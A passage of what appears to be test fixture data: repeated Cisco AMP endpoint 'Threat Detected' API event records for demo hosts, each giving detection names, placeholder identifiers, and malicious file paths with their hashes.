Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196253","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":334000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":318000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":318000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196250","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":303000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196249","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":287000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196248","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":256000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196247","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":225000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196246","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":225000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196245","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":209000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196244","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":178000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196243","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":147000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196242","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":69000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196241","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":69000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196240","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259080131183000,"timestamp":1610705857,"timestamp_nanoseconds":996000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259080131182683","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":944000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251507855228943","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":8000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":821000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261640","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":758000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261639","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":2712,"disposition":"Malicious","file_name":"t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":758000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261638","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":680000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261637","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":2712,"disposition":"Malicious","file_name":"t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":665000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261636","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
